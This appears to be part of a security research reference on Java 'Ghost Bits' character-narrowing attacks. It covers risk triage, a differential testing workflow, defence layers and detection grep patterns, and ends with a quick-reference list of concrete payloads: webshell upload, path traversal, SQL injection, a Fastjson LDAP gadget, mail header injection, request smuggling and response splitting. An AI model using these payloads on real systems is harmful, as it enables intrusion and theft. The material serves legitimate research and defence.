fromHexDigit
convertHexDigit
fromHex\s*\(
uriDecode
URLDecoder\.decode
sHexValues\[
& 0x1F\)\s*\+\s*\(.*>>.*\) \* 25

Tier 3 — high-risk wrappers and reachability


RFC2231                # Tomcat / mail filename* parsing
JavaReader             # BCEL ClassLoader reachable
ASCIIUtility           # Jakarta Mail / Angus Mail
LineParser             # HttpClient header parser
ChunkedDecoder         # request smuggling adjacent
charToHex              # Jackson
encodeUTF8             # candidate for char->byte writer

Per-finding triage applies the five-dimension risk model:

| Dimension | Higher risk if |
|---|---|
| Input control | HTTP param, header, filename, JSON key, mail address |
| Validation | a deny/allow list runs before the narrowing site |
| Narrowing time | conversion happens after security check |
| Syntax target | result enters URL / SMTP / HTTP / Redis / file system / SQL grammar |
| Re-decoding | Base64, URL-decode, JSON unescape, `%u`, etc. happen later |

Risk formula:
attacker-controlled  +  check-before-narrow  +  result-in-protocol-syntax
                                              +  later-redecoding
                              = HIGH SEVERITY
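
One way to make the risk formula mechanical during triage is sketched below. The `Finding` fields mirror the five dimensions, and HIGH follows the formula directly. The MEDIUM and LOW thresholds are an assumption added for illustration, since the source only defines the high-severity case.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    attacker_controlled: bool          # Input control
    validated_before_narrowing: bool   # Validation
    narrowed_after_check: bool         # Narrowing time
    enters_protocol_syntax: bool       # Syntax target
    redecoded_later: bool              # Re-decoding


def severity(finding: Finding) -> str:
    """Apply the risk formula; levels below HIGH are illustrative only."""
    check_before_narrow = (finding.validated_before_narrowing
                           and finding.narrowed_after_check)
    terms = [
        finding.attacker_controlled,
        check_before_narrow,
        finding.enters_protocol_syntax,
        finding.redecoded_later,
    ]
    if all(terms):
        return "HIGH"
    # Assumption: the source gives no thresholds below HIGH.
    return "MEDIUM" if sum(terms) >= 2 else "LOW"


print(severity(Finding(True, True, True, True, True)))
```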

9. DIFFERENTIAL TESTING WORKFLOW

A reproducible, black-box procedure to find new Ghost Bits sinks (red team) or to validate a fix (blue team).
1. Pick one dangerous byte T at a time (e.g. 0x2E for '.').

2. Generate the candidate set:
       C = { chr((k << 8) | T) for k in 1..255 }
   Drop surrogates 0xD8XX..0xDFXX.

3. For each candidate c in C:
       a. Send a benign request with c at the chosen position.
       b. Send the same request with literal T at the same position.
       c. Send the same request with a "neutral" character (e.g. 'X') at the
          same position as a baseline.
       d. Compare four observables:
            - status code
            - response body length
            - response body content hash (or diff)
            - server-side log line (if available)

4. If any candidate produces a response equivalent to the one for literal T
   but different from the neutral baseline, you have found a narrowing sink.

5. Repeat for the next T in your priority list:
       0x2E ('.'), 0x2F ('/'), 0x25 ('%'), 0x40 ('@'),
       0x0D ('\r'), 0x0A ('\n'), 0x6A ('j'), 0x73 ('s'),
       0x6C ('l'), 0x61 ('a'), 0x63 ('c'), 0x22 ('"'), 0x27 ('\'')

6. Cluster sinks by component (response Server header, error stack) — one
   sink usually implies the whole framework version is vulnerable.
This workflow is intentionally protocol-agnostic; the same loop works on a file uploader, a search endpoint, a mail composer, or a Redis-backed cache.
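
The loop above might be sketched as follows. The `send` callable is a stand-in for whatever client talks to the system under test, and `fake_backend` is a hypothetical simulation of a server that narrows `char` to `byte`, included only so the example runs offline. The server-side log observable is omitted because a black-box harness usually cannot see it.

```python
import hashlib
from typing import Callable, NamedTuple


class Observation(NamedTuple):
    status: int
    length: int
    body_hash: str


def candidates(target: int) -> list[str]:
    """Step 2: every BMP char whose low byte is `target`, surrogates dropped."""
    return [chr((k << 8) | target) for k in range(1, 256)
            if not 0xD8 <= k <= 0xDF]


def find_narrowing(target: int,
                   send: Callable[[str], Observation],
                   neutral: str = "X") -> list[str]:
    """Steps 3-4: candidates that behave like literal T, unlike the baseline."""
    literal = send(chr(target))
    baseline = send(neutral)
    if literal == baseline:
        return []  # T is indistinguishable here, so nothing can be inferred
    return [c for c in candidates(target) if send(c) == literal]


def fake_backend(ch: str) -> Observation:
    """Hypothetical server that keeps only the low 8 bits, then blocks '.'."""
    seen = chr(ord(ch) & 0xFF)
    status = 403 if seen == "." else 200
    body = f"seen={seen}".encode("utf-8")
    return Observation(status, len(body), hashlib.sha256(body).hexdigest())


hits = find_narrowing(0x2E, fake_backend)
print(len(hits), "candidates behave like '.'")
```

Against a real target, an empty result for one position says little; the same byte may still narrow at a different sink or parameter.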

10. DEFENSE AWARENESS

Five layers, all needed; any single one is bypassable in isolation.

| Layer | Action |
|---|---|
| Source code | Ban hand-written `(byte) ch`, `& 0xFF`, `out.write(ch)`, and `writeBytes` on character data. Use `getBytes(StandardCharsets.UTF_8)` or a strict ASCII allowlist for protocol fields. |
| Decoder | Reject illegal input. Never default-fold an unknown hex / Unicode digit / Base64 character to 0 or to its low 8 bits. |
| Validation order | Always normalize first, then validate. Specifically: strict decode → Unicode NFC/NFKC → protocol normalize (URL `..` resolution, `File.getCanonicalPath`) → security check → execute. |
| Protocol field | Use strict allowlists per field (HTTP header value, SMTP envelope, URL path, filename, JSON key, XML tag). Reject CR/LF in any header or address. |
| WAF / IDS | Run a multi-view normalizer. Always inspect the original string AND the low-byte (`ch & 0xFF`) view AND the URL-decoded view AND the Unicode-NFKC view. Alert when any view contains a dangerous semantic the original lacked. |

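
A minimal sketch of the multi-view idea from the WAF / IDS row follows. The token list in `DANGEROUS` and the function names are placeholders chosen for illustration; a production normalizer would plug each view into its existing rule engine instead of a substring check.

```python
import unicodedata
from urllib.parse import unquote

# Illustrative tokens only; real rule sets are far richer.
DANGEROUS = ("../", "\r\n", ".jsp", "union select")


def views(raw: str) -> dict[str, str]:
    """Build the four views named in the WAF / IDS row."""
    return {
        "original": raw,
        "low_byte": "".join(chr(ord(ch) & 0xFF) for ch in raw),
        "url_decoded": unquote(raw),
        "nfkc": unicodedata.normalize("NFKC", raw),
    }


def new_semantics(raw: str) -> dict[str, list[str]]:
    """Map view name -> dangerous tokens that appear only in that view."""
    lowered_raw = raw.lower()
    alerts = {}
    for name, text in views(raw).items():
        if name == "original":
            continue
        found = [tok for tok in DANGEROUS
                 if tok in text.lower() and tok not in lowered_raw]
        if found:
            alerts[name] = found
    return alerts


# U+966A has low byte 0x6A ('j'), so the low-byte view reads "shell.jsp".
print(new_semantics("shell.\u966asp"))
```

Alerting on the difference between views, instead of on any single view, keeps false positives down for legitimate non-ASCII input that narrows to nothing dangerous.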
Blue-team smell tests:
  • Logs contain CJK / Latin-Extended characters at positions where the protocol grammar expects ASCII (filename, header value, mail address).
  • The hex dump of a request contains bytes outside `0x20..0x7E` adjacent to protocol delimiters.
  • A pen-test or scanner reports a "weird 200" that the security monitoring did not flag — Ghost Bits is the most common 2025-2026 cause for that pattern in Java stacks.
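
The first smell test can be approximated with a short helper that flags characters outside printable ASCII in a field the protocol expects to be ASCII, and shows the byte each one would narrow to. The function name and the sample header value are hypothetical.

```python
def suspicious_chars(field: str) -> list[tuple[int, str, str]]:
    """Return (index, char, low_byte_hex) for chars outside 0x20..0x7E."""
    flagged = []
    for index, ch in enumerate(field):
        if not 0x20 <= ord(ch) <= 0x7E:
            flagged.append((index, ch, f"0x{ord(ch) & 0xFF:02X}"))
    return flagged


# Hypothetical logged mail address containing U+760D and U+760A,
# whose low bytes are CR (0x0D) and LF (0x0A).
logged = "hacker@evil.com\u760d\u760aSubject: Reset"
for index, ch, low in suspicious_chars(logged):
    print(index, hex(ord(ch)), "narrows to", low)
```

A low byte of `0x0D`, `0x0A`, `0x2E`, or `0x2F` next to a protocol delimiter is a stronger signal than a non-ASCII character alone.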

11. QUICK REFERENCE — KEY PAYLOADS

Ghost char generator

ghost(T, k) = chr(((k & 0xFF) << 8) | (T & 0xFF)) # avoid k in 0xD8..0xDF
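
A runnable version of the generator, paired with a model of the narrowing step, might look like this. `narrow` imitates Java's `(byte) ch` for Basic Multilingual Plane characters only, and both function names are illustrative.

```python
def ghost(target: int, k: int) -> str:
    """Build a char whose low byte is `target` and whose high byte is `k`."""
    high = k & 0xFF
    if 0xD8 <= high <= 0xDF:
        raise ValueError("high byte falls in the UTF-16 surrogate range")
    return chr((high << 8) | (target & 0xFF))


def narrow(text: str) -> bytes:
    """Model (byte) ch: keep the low 8 bits of each BMP character."""
    return bytes(ord(ch) & 0xFF for ch in text)


# High byte 0x96 with low byte 0x6A gives U+966A, the char in the Tomcat example.
payload = "shell." + ghost(ord("j"), 0x96) + "sp"
print(payload, "->", narrow(payload))
```

Any non-surrogate `k` works, so a filter that blocks one specific ghost character leaves over two hundred alternatives for the same byte.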

Tomcat filename* webshell upload

Content-Disposition: attachment; filename*="UTF-8''shell.陪sp" # → shell.jsp

BCEL ClassLoader bypass (concept)

$$BCEL$$<each-byte-of-class-file-wrapped-in-a-Unicode-char>

Jackson SQLi smuggling

{"q":"\u丰丰耳失 union select 1,2,3-- "} # → "1 union select…"

Fastjson @type smuggling

{"\x4_type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x"}

Spring URL decode + Jetty %2> folding

GET /api/data?file=阮丯阮丯etc丯passwd
GET /setup/setup-s/%2>%2>/log.jsp
GET /api?cmd=Ru%6>time

Spring4Shell name* class smuggling

Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader..."

Spring CVE-2025-41242 path read

GET /resources/阮严灵丰丰甲来/secret.properties # → .%u002e → ..

Angus Mail / Jira mail hijack

From: hacker@evil.com瘍瘊Subject: Reset瘍瘊To: victim@org.com瘍瘊瘍瘊Your code is 1234

Apache HttpClient ≤4.5.9 smuggling

X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\r\nHost: internal\r\nContent-Length: 0\r\n\r\nGET /public HTTP/1.1

JDK HttpServer response splitting (CVE-2026-21933)

?ref=Cu瘍瘊Content-Type:text/html瘍瘊Content-Length:33瘍瘊瘍瘊<script>alert(1)</script>

SAST first-pass grep

grep -RnE '\(byte\)\s*\w+|& 0[xX][fF][fF]|writeBytes|baos\.write\(\w+\)' src/
grep -RnE 'Character\.digit|fromHexDigit|charToHex|uriDecode' src/

---

REFERENCES

  • Black Hat Asia 2026 — Cast Attack: A New Threat Posed by Ghost Bits in Java. Speakers: Xinyu Bai (@b1u3r / @iSafeBlue), Zhihui Chen (@1ue). Contributor: Zongzheng Zheng (@chun_springX).
  • Real-world CVEs re-enabled: GeoServer CVE-2024-36401, Spring4Shell CVE-2022-22965, Openfire CVE-2023-32315, Spring CVE-2025-41242, Jakarta Mail CVE-2025-57733, JDK HttpServer CVE-2026-21933, Apache HttpClient HTTPCLIENT-1974 / HTTPCLIENT-1978.
  • Patched components to upgrade past: Apache Commons BCEL >= 6.12.0, Fastjson 2.x latest, Apache HttpClient >= 4.5.10 (or migrate to 5.x), GeoServer >= 2.28.3, Openfire >= 5.0.4. Confirm vendor advisories before relying on any single version number.